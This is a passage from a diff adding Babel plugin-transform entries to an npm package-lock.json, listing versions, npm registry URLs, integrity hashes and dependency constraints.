"sha512-Dt9LQs6iEY++gXUwY03DNFat5C2NbO48jj+j/bSAz6b3HgPs39qcPiYt77fDObIcFwj3/C2ICX9YMwGflUoSHQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-async-generator-functions": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-generator-functions/-/plugin-transform-async-generator-functions-7.25.0.tgz", + "integrity": "sha512-uaIi2FdqzjpAMvVqvB51S42oC2JEVgh0LDsGfZVDysWE8LrJtQC2jvKmOqEYThKyB7bDEb7BP1GYWDm7tABA0Q==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-remap-async-to-generator": "^7.25.0", + "@babel/plugin-syntax-async-generators": "^7.8.4", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-async-to-generator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.24.7.tgz", + "integrity": "sha512-SQY01PcJfmQ+4Ash7NE+rpbLFbmqA2GPIgqzxfFTL4t1FKRq4zTms/7htKpoCUI9OcFYgzqfmCdH53s6/jn5fA==", + "dev": true, + "dependencies": { + "@babel/helper-module-imports": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-remap-async-to-generator": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-block-scoped-functions": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.24.7.tgz", + "integrity": "sha512-yO7RAz6EsVQDaBH18IDJcMB1HnrUn2FJ/Jslc/WtPPWcjhpUJXU/rjbwmluzp7v/ZzWcEhTMXELnnsz8djWDwQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-block-scoping": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.25.0.tgz", + "integrity": "sha512-yBQjYoOjXlFv9nlXb3f1casSHOZkWr29NX+zChVanLg5Nc157CrbEX9D7hxxtTpuFy7Q0YzmmWfJxzvps4kXrQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-class-properties": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-class-properties/-/plugin-transform-class-properties-7.24.7.tgz", + "integrity": "sha512-vKbfawVYayKcSeSR5YYzzyXvsDFWU2mD8U5TFeXtbCPLFUqe7GyCgvO6XDHzje862ODrOwy6WCPmKeWHbCFJ4w==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-class-static-block": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-class-static-block/-/plugin-transform-class-static-block-7.24.7.tgz", + "integrity": "sha512-HMXK3WbBPpZQufbMG4B46A90PkuuhN9vBCb5T8+VAHqvAqvcLi+2cKoukcpmUYkszLhScU3l1iudhrks3DggRQ==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-class-static-block": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.12.0" + } + }, + "node_modules/@babel/plugin-transform-classes": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-classes/-/plugin-transform-classes-7.25.0.tgz", + "integrity": "sha512-xyi6qjr/fYU304fiRwFbekzkqVJZ6A7hOjWZd+89FVcBqPV3S9Wuozz82xdpLspckeaafntbzglaW4pqpzvtSw==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-compilation-targets": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-replace-supers": "^7.25.0", + "@babel/traverse": "^7.25.0", + "globals": "^11.1.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-computed-properties": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.24.7.tgz", + "integrity": "sha512-25cS7v+707Gu6Ds2oY6tCkUwsJ9YIDbggd9+cu9jzzDgiNq7hR/8dkzxWfKWnTic26vsI3EsCXNd4iEB6e8esQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/template": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-destructuring": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.24.8.tgz", + "integrity": "sha512-36e87mfY8TnRxc7yc6M9g9gOB7rKgSahqkIKwLpz4Ppk2+zC2Cy1is0uwtuSG6AE4zlTOUa+7JGz9jCJGLqQFQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-dotall-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.24.7.tgz", + "integrity": "sha512-ZOA3W+1RRTSWvyqcMJDLqbchh7U4NRGqwRfFSVbOLS/ePIP4vHB5e8T8eXcuqyN1QkgKyj5wuW0lcS85v4CrSw==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-duplicate-keys": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.24.7.tgz", + "integrity": "sha512-JdYfXyCRihAe46jUIliuL2/s0x0wObgwwiGxw/UbgJBr20gQBThrokO4nYKgWkD7uBaqM7+9x5TU7NkExZJyzw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-duplicate-named-capturing-groups-regex": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-duplicate-named-capturing-groups-regex/-/plugin-transform-duplicate-named-capturing-groups-regex-7.25.0.tgz", + "integrity": "sha512-YLpb4LlYSc3sCUa35un84poXoraOiQucUTTu8X1j18JV+gNa8E0nyUf/CjZ171IRGr4jEguF+vzJU66QZhn29g==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-dynamic-import": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dynamic-import/-/plugin-transform-dynamic-import-7.24.7.tgz", + "integrity": "sha512-sc3X26PhZQDb3JhORmakcbvkeInvxz+A8oda99lj7J60QRuPZvNAk9wQlTBS1ZynelDrDmTU4pw1tyc5d5ZMUg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-dynamic-import": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-exponentiation-operator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.24.7.tgz", + "integrity": "sha512-Rqe/vSc9OYgDajNIK35u7ot+KeCoetqQYFXM4Epf7M7ez3lWlOjrDjrwMei6caCVhfdw+mIKD4cgdGNy5JQotQ==", + "dev": true, + "dependencies": { + "@babel/helper-builder-binary-assignment-operator-visitor": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-export-namespace-from": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-export-namespace-from/-/plugin-transform-export-namespace-from-7.24.7.tgz", + "integrity": "sha512-v0K9uNYsPL3oXZ/7F9NNIbAj2jv1whUEtyA6aujhekLs56R++JDQuzRcP2/z4WX5Vg/c5lE9uWZA0/iUoFhLTA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-export-namespace-from": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-flow-strip-types": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-flow-strip-types/-/plugin-transform-flow-strip-types-7.25.9.tgz", + "integrity": "sha512-/VVukELzPDdci7UUsWQaSkhgnjIWXnIyRpM02ldxaVoFK96c41So8JcKT3m0gYjyv7j5FNPGS5vfELrWalkbDA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9", + "@babel/plugin-syntax-flow": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-for-of": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.24.7.tgz", + "integrity": "sha512-wo9ogrDG1ITTTBsy46oGiN1dS9A7MROBTcYsfS8DtsImMkHk9JXJ3EWQM6X2SUw4x80uGPlwj0o00Uoc6nEE3g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-function-name": { + "version": "7.25.1", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.25.1.tgz", + "integrity": "sha512-TVVJVdW9RKMNgJJlLtHsKDTydjZAbwIsn6ySBPQaEAUU5+gVvlJt/9nRmqVbsV/IBanRjzWoaAQKLoamWVOUuA==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/traverse": "^7.25.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-json-strings": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-json-strings/-/plugin-transform-json-strings-7.24.7.tgz", + "integrity": "sha512-2yFnBGDvRuxAaE/f0vfBKvtnvvqU8tGpMHqMNpTN2oWMKIR3NqFkjaAgGwawhqK/pIN2T3XdjGPdaG0vDhOBGw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-json-strings": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-literals": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-literals/-/plugin-transform-literals-7.25.2.tgz", + "integrity": "sha512-HQI+HcTbm9ur3Z2DkO+jgESMAMcYLuN/A7NRw9juzxAezN9AvqvUTnpKP/9kkYANz6u7dFlAyOu44ejuGySlfw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-logical-assignment-operators": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-logical-assignment-operators/-/plugin-transform-logical-assignment-operators-7.24.7.tgz", + "integrity": "sha512-4D2tpwlQ1odXmTEIFWy9ELJcZHqrStlzK/dAOWYyxX3zT0iXQB6banjgeOJQXzEc4S0E0a5A+hahxPaEFYftsw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-member-expression-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-member-expression-literals/-/plugin-transform-member-expression-literals-7.24.7.tgz", + "integrity": "sha512-T/hRC1uqrzXMKLQ6UCwMT85S3EvqaBXDGf0FaMf4446Qx9vKwlghvee0+uuZcDUCZU5RuNi4781UQ7R308zzBw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-amd": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.24.7.tgz", + "integrity": "sha512-9+pB1qxV3vs/8Hdmz/CulFB8w2tuu6EB94JZFsjdqxQokwGa9Unap7Bo2gGBGIvPmDIVvQrom7r5m/TCDMURhg==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-commonjs": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.24.8.tgz", + "integrity": "sha512-WHsk9H8XxRs3JXKWFiqtQebdh9b/pTk4EgueygFzYlTKAg0Ud985mSevdNjdXdFBATSKVJGQXP1tv6aGbssLKA==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.8", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-simple-access": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-systemjs": { + "version": "7.25.0", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.25.0.tgz", + "integrity": "sha512-YPJfjQPDXxyQWg/0+jHKj1llnY5f/R6a0p/vP4lPymxLu7Lvl4k2WMitqi08yxwQcCVUUdG9LCUj4TNEgAp3Jw==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-validator-identifier": "^7.24.7", + "@babel/traverse": "^7.25.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-modules-umd": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.24.7.tgz", + "integrity": "sha512-3aytQvqJ/h9z4g8AsKPLvD4Zqi2qT+L3j7XoFFu1XBlZWEl2/1kWnhmAbxpLgPrHSY0M6UA02jyTiwUVtiKR6A==", + "dev": true, + "dependencies": { + "@babel/helper-module-transforms": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-named-capturing-groups-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-named-capturing-groups-regex/-/plugin-transform-named-capturing-groups-regex-7.24.7.tgz", + "integrity": "sha512-/jr7h/EWeJtk1U/uz2jlsCioHkZk1JJZVcc8oQsJ1dUlaJD83f4/6Zeh2aHt9BIFokHIsSeDfhUmju0+1GPd6g==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/plugin-transform-new-target": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.24.7.tgz", + "integrity": "sha512-RNKwfRIXg4Ls/8mMTza5oPF5RkOW8Wy/WgMAp1/F1yZ8mMbtwXW+HDoJiOsagWrAhI5f57Vncrmr9XeT4CVapA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-nullish-coalescing-operator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-nullish-coalescing-operator/-/plugin-transform-nullish-coalescing-operator-7.24.7.tgz", + "integrity": "sha512-Ts7xQVk1OEocqzm8rHMXHlxvsfZ0cEF2yomUqpKENHWMF4zKk175Y4q8H5knJes6PgYad50uuRmt3UJuhBw8pQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-numeric-separator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-numeric-separator/-/plugin-transform-numeric-separator-7.24.7.tgz", + "integrity": "sha512-e6q1TiVUzvH9KRvicuxdBTUj4AdKSRwzIyFFnfnezpCfP2/7Qmbb8qbU2j7GODbl4JMkblitCQjKYUaX/qkkwA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-numeric-separator": "^7.10.4" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-assign": { + "version": "7.23.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-assign/-/plugin-transform-object-assign-7.23.3.tgz", + "integrity": "sha512-TPJ6O7gVC2rlQH2hvQGRH273G1xdoloCj9Pc07Q7JbIZYDi+Sv5gaE2fu+r5E7qK4zyt6vj0FbZaZTRU5C3OMA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-rest-spread": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-rest-spread/-/plugin-transform-object-rest-spread-7.24.7.tgz", + "integrity": "sha512-4QrHAr0aXQCEFni2q4DqKLD31n2DL+RxcwnNjDFkSG0eNQ/xCavnRkfCUjsyqGC2OviNJvZOF/mQqZBw7i2C5Q==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-transform-parameters": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-super": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.24.7.tgz", + "integrity": "sha512-A/vVLwN6lBrMFmMDmPPz0jnE6ZGx7Jq7d6sT/Ev4H65RER6pZ+kczlf1DthF5N0qaPHBsI7UXiE8Zy66nmAovg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-replace-supers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-optional-catch-binding": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-optional-catch-binding/-/plugin-transform-optional-catch-binding-7.24.7.tgz", + "integrity": "sha512-uLEndKqP5BfBbC/5jTwPxLh9kqPWWgzN/f8w6UwAIirAEqiIVJWWY312X72Eub09g5KF9+Zn7+hT7sDxmhRuKA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-optional-catch-binding": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-optional-chaining": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-optional-chaining/-/plugin-transform-optional-chaining-7.24.8.tgz", + "integrity": "sha512-5cTOLSMs9eypEy8JUVvIKOu6NgvbJMnpG62VpIHrTmROdQ+L5mDAaI40g25k5vXti55JWNX5jCkq3HZxXBQANw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-syntax-optional-chaining": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-parameters": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.24.7.tgz", + "integrity": "sha512-yGWW5Rr+sQOhK0Ot8hjDJuxU3XLRQGflvT4lhlSY0DFvdb3TwKaY26CJzHtYllU0vT9j58hc37ndFPsqT1SrzA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-private-methods": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-private-methods/-/plugin-transform-private-methods-7.24.7.tgz", + "integrity": "sha512-COTCOkG2hn4JKGEKBADkA8WNb35TGkkRbI5iT845dB+NyqgO8Hn+ajPbSnIQznneJTa3d30scb6iz/DhH8GsJQ==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-private-property-in-object": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-private-property-in-object/-/plugin-transform-private-property-in-object-7.24.7.tgz", + "integrity": "sha512-9z76mxwnwFxMyxZWEgdgECQglF2Q7cFLm0kMf8pGwt+GSJsY0cONKj/UuO4bOH0w/uAel3ekS4ra5CEAyJRmDA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-private-property-in-object": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-property-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-property-literals/-/plugin-transform-property-literals-7.24.7.tgz", + "integrity": "sha512-EMi4MLQSHfd2nrCqQEWxFdha2gBCqU4ZcCng4WBGZ5CJL4bBRW0ptdqqDdeirGZcpALazVVNJqRmsO8/+oNCBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-constant-elements": { + "version": "7.23.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-constant-elements/-/plugin-transform-react-constant-elements-7.23.3.tgz", + "integrity": "sha512-zP0QKq/p6O42OL94udMgSfKXyse4RyJ0JqbQ34zDAONWjyrEsghYEyTSK5FIpmXmCpB55SHokL1cRRKHv8L2Qw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-display-name": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-display-name/-/plugin-transform-react-display-name-7.24.7.tgz", + "integrity": "sha512-H/Snz9PFxKsS1JLI4dJLtnJgCJRoo0AUm3chP6NYr+9En1JMKloheEiLIhlp5MDVznWo+H3AAC1Mc8lmUEpsgg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-inline-elements": { + "version": "7.23.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-inline-elements/-/plugin-transform-react-inline-elements-7.23.3.tgz", + "integrity": "sha512-NM86KpgxSSvk+GG/PiTBCw386OYdcpLRM6jngy84U7dsZKdtRQSud6BRxSzvuoQmP9r7b7V6X4P9PJjsWVr9mA==", + "dev": true, + "dependencies": { + "@babel/helper-builder-react-jsx": "^7.22.10", + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx/-/plugin-transform-react-jsx-7.25.2.tgz", + "integrity": "sha512-KQsqEAVBpU82NM/B/N9j9WOdphom1SZH3R+2V7INrQUH+V9EBFwZsEJl8eBIVeQE62FxJCc70jzEZwqU7RcVqA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-module-imports": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/plugin-syntax-jsx": "^7.24.7", + "@babel/types": "^7.25.2" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx-development": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-development/-/plugin-transform-react-jsx-development-7.24.7.tgz", + "integrity": "sha512-QG9EnzoGn+Qar7rxuW+ZOsbWOt56FvvI93xInqsZDC5fsekx1AlIO4KIJ5M+D0p0SqSH156EpmZyXq630B8OlQ==", + "dev": true, + "dependencies": { + "@babel/plugin-transform-react-jsx": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-pure-annotations": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-pure-annotations/-/plugin-transform-react-pure-annotations-7.24.7.tgz", + "integrity": "sha512-PLgBVk3fzbmEjBJ/u8kFzOqS9tUeDjiaWud/rRym/yjCo/M9cASPlnrd2ZmmZpQT40fOOrvR8jh+n8jikrOhNA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-regenerator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.24.7.tgz", + "integrity": "sha512-lq3fvXPdimDrlg6LWBoqj+r/DEWgONuwjuOuQCSYgRroXDH/IdM1C0IZf59fL5cHLpjEH/O6opIRBbqv7ELnuA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "regenerator-transform": "^0.15.2" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-reserved-words": { + "version": "7.24.7", + "resolved": 